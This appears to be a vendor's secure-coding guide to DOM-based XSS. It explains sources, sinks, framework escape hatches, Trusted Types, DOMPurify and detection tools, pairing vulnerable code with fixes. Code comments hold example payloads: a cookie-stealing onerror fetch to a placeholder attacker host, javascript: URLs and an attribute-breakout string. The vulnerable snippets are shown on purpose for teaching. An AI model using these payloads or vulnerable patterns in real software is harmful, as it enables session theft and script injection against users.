
DOM-Based XSS: Sources, Sinks, and JavaScript Defenses

April 25, 2026 · 17 min read · SecureCodingHub Team
[Figure: source → sink (taint) data-flow diagram]

DOM-based cross-site scripting is the XSS variant the server never sees. The malicious payload never appears in a request body, never lands in the response template, and never trips a server-side WAF. It lives entirely in the browser — read by client-side JavaScript from a source like location.hash or postMessage, then written into a sink like innerHTML or eval that hands the string to the HTML or JavaScript parser. This guide is the DOM-based sub-cluster of our wider cross-site scripting pillar: the source/sink taxonomy, the data-flow mental model, framework-specific gotchas in React, Vue, Angular, and Svelte, the SPA and hash-routing vectors, real-world DOM-based XSS examples, the Trusted Types architectural fix, and the detection tooling that catches what code review misses.

What Is DOM-Based XSS — The Variant the Server Never Sees

Classical reflected and stored XSS share a structural property: the malicious string is, at some point, present in the HTTP response body that the server emits. A reflected payload appears in the URL, gets echoed into the response template, and arrives inside the HTML the server rendered. A stored payload sits in a database row, gets pulled into the rendering pipeline, and ships out the same way. In both cases the server is in a position to see the payload — and the defenses (template-engine output encoding, sanitization on rendering, WAF response inspection) all assume the server controls the rendering boundary.

DOM-based cross-site scripting breaks that assumption. The vulnerable code path is entirely client-side JavaScript: the payload arrives through a channel the server cannot inspect (the URL fragment after #, a postMessage from another window, the window.name of the current frame, a value previously stashed in localStorage) and is consumed by JavaScript after the page loads. The server's HTML is identical for every visitor; the injection happens in the DOM. A WAF sniffing request bodies never sees the payload because it was never in the request body. The canonical illustration: an attacker crafts https://victim.example/app#<img src=x onerror=alert(1)>, the victim's browser sends only the path and query to the server, and the fragment lives entirely in the client where vulnerable JavaScript reads it.

The class was first described formally by Amit Klein in 2005, before the SPA era made it dominant. With the rise of React, Vue, and Angular, DOM XSS is now the most common XSS variant in modern web architectures. The reflected and stored forms persist in legacy server-rendered code paths; the DOM form is where new bugs land in 2026.

Sources — Where Attacker-Controllable Data Enters the DOM

The DOM-XSS taxonomy is built around two primitives: sources, where untrusted data enters JavaScript, and sinks, where JavaScript hands strings to the parser. A vulnerability is a data flow from a source to a sink without sanitization in between. Recognizing the source list is the first half of the recognition skill.

URL-derived sources. location.hash is the canonical DOM-XSS source — the fragment is attacker-controllable through a crafted link, never sent to the server, and frequently consumed by client-side routers. location.search, location.pathname, and location.href all carry attacker-influenced data. document.URL, document.documentURI, and document.baseURI are aliases. document.referrer is fully attacker-controllable when the attacker hosts the previous page.

Cross-window messaging. postMessage is the API by which one window sends data to another; the message event exposes event.data, event.origin, and event.source. Without an origin allowlist on the handler, any page the victim opens (tab, iframe, popup) can send a message that the vulnerable handler will process. window.name persists across navigations and is set by any page that frames the victim — a long-known DOM-XSS source that survived popup blockers becoming standard.

Storage sources. document.cookie, localStorage, sessionStorage, and indexedDB all return strings the application previously stored. They become DOM-XSS sources whenever earlier code wrote attacker-controlled data into them — a stored-into-DOM chain that bypasses output encoding because the data now comes "from storage" rather than "from a parameter."
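The stored-into-DOM chain can be sketched with two hypothetical helpers, storeTrackingParam and readLastRef. The taint survives the storage round-trip, so the later read must be validated as if it came straight from the URL:

```javascript
// Earlier page load: an attacker-influenced query param is stashed.
function storeTrackingParam(search, storage) {
  const ref = new URLSearchParams(search).get('ref');
  if (ref !== null) storage.setItem('lastRef', ref);
}

// Later page load: the vulnerable read would be
//   banner.innerHTML = 'Referred by: ' + storage.getItem('lastRef');
// The safe read constrains the value to a known-safe alphabet and
// renders it via textContent.
function readLastRef(storage) {
  const raw = storage.getItem('lastRef') || '';
  return /^[\w.-]{1,64}$/.test(raw) ? raw : 'unknown';
}
```

In the browser, `storage` is `localStorage`; passing it in as a parameter keeps the functions testable.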

Network sources. Fetched JSON, the response of a fetch or XHR call, the body of a Server-Sent Event, a WebSocket message, and Workbox-cached responses are all DOM-XSS sources when the server's content is not strictly under the application's control. A third-party CMS, an unvetted CDN, or a compromised microservice produces JSON the SPA happily renders into innerHTML.
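That rendering-boundary discipline can be sketched as a shape check applied to the parsed JSON before anything touches the DOM. The field names here are hypothetical; the DOM side then renders each value via textContent, never innerHTML:

```javascript
// Validate the shape of an API response before rendering. Anything
// that is not an array of { body: string } objects is dropped.
function toSafeComments(json) {
  if (!Array.isArray(json)) return [];
  return json.flatMap((c) =>
    c !== null && typeof c === 'object' && typeof c.body === 'string'
      ? [{ body: c.body.slice(0, 2000) }] // cap length defensively
      : []
  );
}

// Rendering side (browser only): no parser invocation.
//   const li = document.createElement('li');
//   li.textContent = comment.body;
//   list.appendChild(li);
```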

Sinks — Where Strings Become Code

Sinks are the second half of the taxonomy: the JavaScript APIs that hand strings to the HTML parser, the JavaScript parser, or the URL resolver in a way that allows code execution.

HTML-parsing sinks. element.innerHTML, element.outerHTML, element.insertAdjacentHTML, and document.write/document.writeln all parse the assigned string as HTML and create DOM nodes from any markup it contains. jQuery's .html(), .append(), .prepend(), .before(), .after(), and the constructor $(...) when called with HTML-looking strings invoke the HTML parser internally. Range.createContextualFragment and DOMParser.parseFromString with type text/html also parse HTML.

JavaScript-evaluating sinks. eval evaluates its argument as JavaScript directly. The Function constructor (new Function(...)) compiles its argument as a function body. setTimeout and setInterval evaluate string arguments as JavaScript (the safe form passes a function reference instead). execScript in legacy IE contexts and the javascript: URL handler likewise execute strings as code.
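The setTimeout hazard reduces to one rule: pass a function reference, not a string. A minimal sketch (handleTick is a hypothetical handler):

```javascript
// Attacker-influenced string (e.g. read from location.hash):
const userValue = "'); fetch('//evil.example')//";

// Vulnerable: the string form is compiled as JavaScript, so the
// value above escapes the intended call entirely:
//   setTimeout("handleTick('" + userValue + "')", 100);

// Safe: a function reference is never re-parsed; userValue stays data.
function handleTick(value) {
  return `tick: ${value}`; // value is text, never code
}
setTimeout(() => handleTick(userValue), 100);
```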

URL-context sinks. Assigning to location or location.href, calling location.assign or location.replace with attacker input, or setting the src/href/action/formaction attribute of a script-bearing or navigation-capable element opens a URL. If the URL begins with javascript:, navigation executes the rest of the URL as JavaScript in the current origin. Setting iframe.src to a javascript: URL has the same effect.

The catalog isn't exhaustive — the Trusted Types specification enumerates the full list of injection sinks — but innerHTML, document.write, eval, setTimeout-string, and javascript:-URL navigation cover the vast majority of production DOM-XSS bugs.

The Data Flow — Source to Sink, No Server Roundtrip

A DOM-XSS bug is a path from a source to a sink with no sanitization in between. The pattern, in the simplest form: client-side JavaScript reads a value from location.hash, performs zero or near-zero validation, and writes it into element.innerHTML. The server is never involved. The bug exists even if the application is otherwise hardened, has a strict CSP for server-emitted scripts, sanitizes every server template, and runs through a WAF on every request.

The first vulnerable-versus-fixed pair below shows the canonical case — a hash-driven greeting widget on a single-page app:

// Vulnerable: location.hash flows directly into innerHTML
function showGreeting() {
  // URL like /app#<img src=x onerror=fetch('//evil.example/'+document.cookie)>
  const name = decodeURIComponent(location.hash.slice(1));
  document.querySelector('#greeting').innerHTML =
    `<h2>Welcome, ${name}!</h2>`;
}
window.addEventListener('hashchange', showGreeting);
showGreeting();

// The hash is attacker-controllable via a crafted link.
// The img tag is parsed by the HTML parser; the onerror handler
// fires immediately because src=x fails to load. The attacker now
// has script execution in the application's origin.
// Fixed: parse and validate, render text via textContent
function showGreeting() {
  const raw = decodeURIComponent(location.hash.slice(1));
  // Reject anything that isn't plain alphanumerics + spaces
  const safe = /^[\w\s.-]{1,64}$/.test(raw) ? raw : 'guest';

  const target = document.querySelector('#greeting');
  target.replaceChildren();
  const h2 = document.createElement('h2');
  h2.textContent = `Welcome, ${safe}!`;
  target.appendChild(h2);
}

// No HTML parser is invoked. The hash content is constrained to a
// safe alphabet; even an unconstrained value would be rendered as
// text via textContent and never reinterpreted as markup.

The fix relies on two principles: validate the source, and use a sink that does not invoke the parser. Either alone would prevent this specific bug; both together produce defense-in-depth against future code that might bypass one or the other. The source-to-sink mental model is the same one we apply across server-side injection — see our OWASP A03 injection developer guide for the broader pattern — but the source list and sink list are entirely different in the DOM context.

The second vulnerable-versus-fixed pair shows document.write, the legacy sink that renders the page synchronously and parses its argument as HTML:

// Vulnerable: document.write of a URL parameter
const params = new URLSearchParams(location.search);
const ref = params.get('ref') || '';
document.write(
  '<a href="' + ref + '">Continue to your referrer</a>'
);

// /page?ref=javascript:alert(document.domain) produces an <a> whose
// href executes JavaScript on click. A value like
// "><script>alert(1)</script><a%20href=" breaks out of the attribute entirely.
// Fixed: avoid document.write; build the element, validate the URL
const params = new URLSearchParams(location.search);
const raw = params.get('ref') || '';

let safeUrl = '/';
try {
  const url = new URL(raw, location.origin);
  // Only http(s) protocols and same-origin destinations
  if ((url.protocol === 'https:' || url.protocol === 'http:')
      && url.origin === location.origin) {
    safeUrl = url.href;
  }
} catch { /* invalid URL — keep safeUrl = '/' */ }

const a = document.createElement('a');
a.href = safeUrl;
a.textContent = 'Continue to your referrer';
document.querySelector('#nav').appendChild(a);

// new URL() is the standardized URL parser; it rejects malformed
// input by throwing a TypeError. The protocol allowlist neutralizes
// javascript:, data:, vbscript:, and similar schemes.

Both fixes share a structural move: replace string concatenation with explicit DOM construction, and validate the untrusted segment before it crosses any parser boundary. Once that pattern is internalized, most DOM-XSS sinks become recognizable in code review.

DOM XSS in Modern Frameworks

React, Vue, Angular, and Svelte all default to safe rendering: interpolated values pass through the framework's escaping layer and become text nodes, not markup. The DOM-XSS surface in these frameworks concentrates around the explicit escape hatches the framework provides for the legitimate-but-rare case of rendering pre-trusted HTML.

React's escape hatch is dangerouslySetInnerHTML, named to discourage casual use. The third vulnerable-versus-fixed pair below shows the canonical fix when rich-text rendering is genuinely required and the data may come from a URL fragment or any attacker-influenced source:

// Vulnerable: dangerouslySetInnerHTML with URL fragment data
import React from 'react';

function Banner() {
  const message = decodeURIComponent(location.hash.slice(1));
  return (
    <div
      className="banner"
      dangerouslySetInnerHTML={{ __html: message }}
    />
  );
}

// /app#<img src=x onerror=alert(1)> produces script execution.
// Fixed: DOMPurify with a strict allowlist (or strip HTML entirely)
import React, { useMemo } from 'react';
import DOMPurify from 'dompurify';

function Banner() {
  const message = decodeURIComponent(location.hash.slice(1));
  const safeHtml = useMemo(
    () => DOMPurify.sanitize(message, {
      ALLOWED_TAGS: ['b', 'i', 'em', 'strong'],
      ALLOWED_ATTR: [],
    }),
    [message]
  );
  return (
    <div
      className="banner"
      dangerouslySetInnerHTML={{ __html: safeHtml }}
    />
  );
}

// Or, if the message is plain text, skip dangerouslySetInnerHTML
// entirely:
//   return <div className="banner">{message}</div>
// React will escape it for HTML body context automatically.

Vue's equivalent is v-html, with the same semantics: the bound expression is parsed as HTML and inserted into the DOM. Use it only with sanitized output. Angular goes further: by default Angular's DomSanitizer strips dangerous content from [innerHTML] bindings. Developers explicitly opt out via bypassSecurityTrustHtml, bypassSecurityTrustScript, bypassSecurityTrustUrl, and friends — those bypasses are the high-signal grep target in any Angular code review. Svelte exposes @html for the same purpose with the same hazard. The pattern across all four: framework auto-escape eliminates the bulk of the class, the named escape hatch is the residual surface, and code review with a grep for the escape hatches catches most regressions before they ship.

The fourth pair shows jQuery, which remains in long-tail production code and whose convenience APIs are nearly all DOM-XSS sinks:

// Vulnerable: jQuery .html() with user-derived data
$('#search-results').html(
  '<p>Results for: ' + queryFromUrl + '</p>'
);

// $().html() invokes the HTML parser; the constructor $('<div>'+x+'</div>')
// also parses, as do .append, .prepend, .before, .after when given
// HTML-looking strings.
// Fixed: .text() for plain rendering, DOMPurify for rich text
$('#search-results').text('Results for: ' + queryFromUrl);

// Or, if HTML is genuinely needed:
$('#search-results').html(DOMPurify.sanitize(messageHtml));

// .text() never invokes the HTML parser; it inserts a text node.
// DOMPurify is the only client-side sanitizer this guide
// recommends — Cure53 maintains it and tracks mutation-XSS
// bypasses continuously.

SPA, Hash Routing, and Fragment-Driven App Vectors

Single-page apps introduced DOM-XSS surfaces that didn't meaningfully exist in server-rendered apps. Hash-based routing — the #/users/123 URL pattern that older SPA routers used to avoid full-page reloads — turns the URL fragment into a routing parameter. Naive routers concatenate route arguments into rendered HTML; crafted hash fragments inject markup. Modern routers (Vue Router history mode, React Router's data router, Angular Router, SvelteKit's router) default to history-API routing, which removes the fragment angle. But hash routing persists in older codebases, in static-hosted SPAs that cannot configure server-side fallbacks, and in embedded webviews where hash-based deep linking is simplest.
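The naive-router hazard can be sketched with a hypothetical parseHashRoute. The vulnerable version would concatenate the captured argument into innerHTML; constraining the argument at parse time removes the markup angle entirely:

```javascript
// Vulnerable pattern a naive hash router produces:
//   outlet.innerHTML = '<h1>Profile: ' + routeArg + '</h1>';
// A fragment like #/users/<img%20src=x%20onerror=alert(1)> injects markup.

// Safe: validate the route argument against a strict alphabet.
function parseHashRoute(hash) {
  let decoded;
  try {
    decoded = decodeURIComponent(hash);
  } catch {
    return { view: 'not-found', arg: null }; // malformed %-escape
  }
  const m = /^#\/users\/([\w-]{1,32})$/.exec(decoded);
  return m ? { view: 'users', arg: m[1] } : { view: 'not-found', arg: null };
}
```

The rendering side then uses textContent for the argument, so even a future loosening of the regex never reaches the HTML parser.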

Beyond routing, SPAs render JSON from APIs, and that JSON becomes a DOM-XSS source whenever it carries attacker-controllable strings rendered via innerHTML or framework escape hatches. The migration from "server controls the rendered HTML" to "server emits JSON, client controls rendering" shifted the entire XSS surface into the client, and the discipline of treating every API response as untrusted at the rendering boundary is the SPA-era equivalent of treating every database row as untrusted (the lesson of stored XSS).

Real-World DOM XSS Examples

DOM-XSS bugs in production are common but less publicly documented than reflected and stored variants because the programs that surface them often involve internal admin tools, third-party scripts, and SaaS integrations whose details aren't published. Three patterns recur often enough to count as canonical DOM-based XSS examples.

WordPress plugin DOM sinks. The WordPress plugin ecosystem has produced many DOM-XSS findings, frequently in slider plugins, contact-form plugins, and analytics integrations that read URL parameters and inject them into innerHTML or document.write. Wordfence and Patchstack disclosure feeds carry several per quarter — typically rated medium-to-high severity, exploitable through a crafted link. The pattern is consistent: the plugin reads ?utm_source= or a similar tracking parameter on the client side and renders it without encoding into a banner or dashboard widget.

Third-party tag managers and analytics pixels. Tag managers (Google Tag Manager, Tealium, Adobe Launch) execute attacker-influenced templates that read URL parameters, cookies, dataLayer values, and postMessage data. A misconfigured tag — typically a "custom HTML" template with an unsanitized data-layer interpolation — becomes a DOM-XSS surface across every page that loads the tag. The vector is high-impact because tag manager scripts run on every page; a single bad tag affects the entire site.

postMessage handlers without origin allowlists. The fifth vulnerable-versus-fixed pair below shows a pattern that has appeared across many SaaS embed widgets and OAuth popups — a parent window receives messages from a child iframe, processes them, and writes the data into the DOM without validating the message origin:

// Vulnerable: postMessage handler trusts every sender
window.addEventListener('message', (event) => {
  // No origin check, no data shape validation
  document.querySelector('#widget').innerHTML = event.data.html;
  if (event.data.callback) {
    eval(event.data.callback); // double sin
  }
});

// Any page the victim opens — in a popup, in an iframe, in a tab
// pointed at the victim by a malicious link — can postMessage to
// the victim's window and trigger script execution.
// Fixed: origin allowlist + shape validation + safe rendering
const TRUSTED_ORIGINS = new Set([
  'https://widgets.example.com',
  'https://embed.example.com',
]);

window.addEventListener('message', (event) => {
  if (!TRUSTED_ORIGINS.has(event.origin)) return;
  if (typeof event.data !== 'object' || event.data === null) return;
  if (typeof event.data.text !== 'string') return;
  if (event.data.text.length > 500) return;

  // Render as text, no parser invocation
  document.querySelector('#widget').textContent = event.data.text;

  // Never eval. Dispatch via a fixed handler map instead:
  const action = event.data.action;
  const handlers = { close: closeWidget, refresh: refreshWidget };
  if (Object.hasOwn(handlers, action)) handlers[action]();
});

// Origin check rejects messages from any window not on the
// allowlist. Shape validation rejects malformed payloads.
// textContent renders without parsing. The action dispatch uses
// a fixed handler map rather than dynamic evaluation.

Mitigation — Trusted Types, DOMPurify, Safe Parsers, Framework Discipline

The DOM-XSS mitigation stack layers four controls. Each catches a different slice of the class; the layering is what produces strong coverage.

Trusted Types. The Trusted Types API, shipped in Chromium browsers since 2020 and in stable Firefox since 2025, requires DOM sinks to receive Trusted Type objects rather than strings. With Trusted Types enforced via the CSP directive require-trusted-types-for 'script', an assignment like element.innerHTML = userInput throws a TypeError — the assignment requires a TrustedHTML object produced by an explicitly registered policy. The architectural effect is dramatic: the application's DOM-XSS surface narrows from "every innerHTML, document.write, eval, setTimeout-string, and javascript:-URL navigation in the codebase" to "the Trusted Types policy registrations" — a much smaller surface, registered in one or two well-known places, auditable in a single code review.

<!-- Server response header -->
Content-Security-Policy:
  require-trusted-types-for 'script';
  trusted-types app-policy dompurify;
// Application code registers a single safe policy, used everywhere
const sanitize = trustedTypes.createPolicy('app-policy', {
  createHTML: (input) => DOMPurify.sanitize(input, {
    ALLOWED_TAGS: ['b','i','em','strong','p','a'],
    ALLOWED_ATTR: ['href'],
  }),
});

// Every innerHTML assignment now flows through the policy
element.innerHTML = sanitize.createHTML(userHtml);

// Naked string assignment throws:
//   element.innerHTML = userHtml; // TypeError

Trusted Types defines three types — TrustedHTML, TrustedScript, TrustedScriptURL — and the CSP directive enforces the policy across HTML, JavaScript, and script-URL sinks respectively. The migration cost is real but bounded: legacy code that assigned raw strings to innerHTML must route through the policy, and code review enforces that no new sites bypass it.
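One common rollout path, sketched here with a placeholder reporting endpoint, is to stage the directive in report-only mode first and collect violations from legacy assignment sites before enforcing:

```http
Content-Security-Policy-Report-Only:
  require-trusted-types-for 'script';
  trusted-types app-policy dompurify;
  report-uri /csp-violation-endpoint;
```

The /csp-violation-endpoint path is a placeholder; report-uri is the legacy reporting mechanism, and newer deployments use the report-to directive with the Reporting API. Each violation report identifies a sink assignment that still bypasses the policy, turning the migration into a worklist.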

DOMPurify. Where rich-text rendering is genuinely required, DOMPurify is the recommended sanitizer. Maintained by Cure53 and tracking the mutation-XSS bypass literature continuously, DOMPurify parses the input as HTML, walks the DOM applying an allowlist of tags and attributes, strips dangerous URI schemes, and serializes the result. Roll-your-own sanitizers fail predictably to mutation XSS; DOMPurify does not.

Safe URL parsers. The new URL(input, base) constructor is the standardized parser for URLs. Code that constructs URLs from input — for navigation, for href assignment, for fetch — should pass the input through new URL(), validate the resulting protocol against an allowlist (https:, http:, often mailto:), and reject everything else. The pattern eliminates javascript:, data:, vbscript:, and the long tail of unusual schemes that browsers may interpret.
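The pattern generalizes into a small helper. safeHttpUrl is a hypothetical name, and the base is passed in explicitly for testability (in the browser it would be location.origin); add an origin comparison where navigation must stay same-origin:

```javascript
// Resolve and validate a URL; fall back to a safe default on any
// disallowed scheme or unparseable input.
function safeHttpUrl(raw, base, fallback = '/') {
  try {
    const url = new URL(raw, base);
    if (url.protocol === 'https:' || url.protocol === 'http:') {
      return url.href;
    }
  } catch { /* malformed input falls through to the fallback */ }
  return fallback;
}
```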

Framework escape-hatch discipline. Every dangerouslySetInnerHTML, v-html, [innerHTML], {@html}, and Angular bypassSecurityTrust* call is a code-review finding that requires a documented justification and a sanitization step. The Trusted Types layer eliminates the surface architecturally; framework discipline eliminates it culturally; DOMPurify eliminates it tactically. The combination produces XSS-free SPA code as a default state rather than as a goal.

Detection — DOM Invader, Coverage Tool, Static Analysis

Detection of DOM XSS runs across a different tool stack than reflected/stored XSS because the bug lives entirely client-side and never appears in the server's view of the application.

Burp DOM Invader. The DOM Invader extension that ships with Burp Suite instruments the browser to track tainted strings from sources to sinks. The extension marks every value read from a known DOM source, propagates the taint through string operations and JSON parsing, and reports when a tainted string reaches a known DOM sink. The output is a high-signal list of DOM-XSS surfaces in the running application — the closest thing to "automatic DOM XSS scanning" that exists in 2026.

Browser DevTools Coverage tool. The Coverage panel in Chromium DevTools shows which JavaScript code actually executed during a session. Combined with manual fuzzing through DOM sources, the Coverage data reveals which client-side handlers are wired to which DOM events — the routes through the codebase that an attacker can reach. Coverage is not a vulnerability scanner, but it makes the dynamic exploration phase of DOM-XSS testing systematic.

Static analysis with sink-pattern rules. CodeQL, Semgrep, Snyk Code, and SonarQube ship rule packs that flag innerHTML/outerHTML/document.write/eval assignments with non-static input, dangerouslySetInnerHTML props with non-sanitized values, jQuery .html()/.append() calls with variable arguments, and the React/Vue/Angular/Svelte escape hatches in general. The rule packs catch the syntactic patterns reliably; they over-flag inputs that have upstream sanitization the scanner cannot prove. Tuning the rules and combining with an IAST agent is the pattern that keeps signal-to-noise high — see our IAST vs DAST vs SAST comparison guide.

Code review with a DOM-XSS lens. Every PR that touches client-side rendering includes an explicit review for source-to-sink flow. Grep for the sink list (innerHTML, outerHTML, insertAdjacentHTML, document.write, eval, setTimeout with string, Function constructor, dangerouslySetInnerHTML, v-html, [innerHTML], {@html}, bypassSecurityTrust, .html, .append, .prepend, .before, .after) catches the surface mechanically. The reviewer's job is then to trace each hit back to the data source and confirm that either the data is statically safe, or the data flows through Trusted Types/DOMPurify, or the data is constrained by an allowlist. Our secure code review best practices guide covers the broader review discipline; for XSS-specific review, the sink-grep is the highest-leverage habit.
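The sink-grep can even be scripted. A minimal sketch with a deliberately partial pattern list (extend it with the sinks listed above):

```javascript
// Hypothetical helper: flag lines that hit known DOM-XSS sink
// patterns. Over-flags by design; the reviewer traces each hit
// back to its data source.
const SINK_PATTERNS = [
  /\.innerHTML\s*=/, /\.outerHTML\s*=/, /insertAdjacentHTML\(/,
  /document\.write/, /\beval\(/, /new Function\(/,
  /dangerouslySetInnerHTML/, /v-html/, /bypassSecurityTrust/,
];

function findSinkHits(source) {
  return source.split('\n').flatMap((line, i) =>
    SINK_PATTERNS.some((p) => p.test(line))
      ? [{ line: i + 1, text: line.trim() }]
      : []
  );
}
```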

The relationship between DOM XSS and the other XSS variants — and the shared defense-in-depth that sits above all three — is covered in our pillar cross-site scripting developer guide, with deeper dives into the reflected variant, the stored variant, and the XSS prevention defense-in-depth playbook.

· OWASP A03 · DOM XSS · DEVELOPER ENABLEMENT ·

Source-to-Sink Fluency Beats Sink-by-Sink Patching.

A scanner that flags an unsafe innerHTML assignment is better than discovering the bug six months later in a bug bounty report — but neither matches a developer who recognizes the source-to-sink flow before writing the assignment in the first place. SecureCodingHub builds the Trusted Types, framework escape-hatch, and source/sink mental model that turns DOM-based XSS from a recurring scanner finding into something developers catch themselves at code-review time. If your team ships single-page apps and is tired of every pentest producing another DOM-XSS report, we'd be glad to show you how the program changes the input side of that pipeline.

See the Platform

Closing — DOM XSS Is a Mental Model, Not a Pattern Match

The DOM-XSS source list and sink list are finite. A developer who has memorized them can grep a codebase mechanically, find the obvious cases, and patch them. That's the floor of competence, not the ceiling. The harder cases — the ones that ship to production despite the grep — are where the source isn't on the canonical list (a third-party SDK exposing attacker-influenced data through an unfamiliar API), where the sink isn't either (a wrapper library that internally calls innerHTML through a name the grep doesn't know), or where the path between them is long enough that taint isn't obvious in any single function.

The mental model that catches these is the source-to-sink flow framing applied generally: at every boundary where JavaScript receives data from outside the application's static code, treat the data as tainted; at every boundary where JavaScript hands a string to the HTML parser, the JavaScript parser, or the URL resolver, treat the sink as a potential injection point. Trusted Types makes the framing structural — the policy registration is the boundary, and crossing it without sanitization is impossible by construction. DOMPurify and safe URL parsers make the framing tactical where Trusted Types isn't yet in place. Framework escape-hatch discipline and code review make it cultural. None of these layers is exotic; the institutional commitment to apply them consistently is the difference between a program that detects DOM XSS in CI and a program that no longer writes DOM XSS in the first place.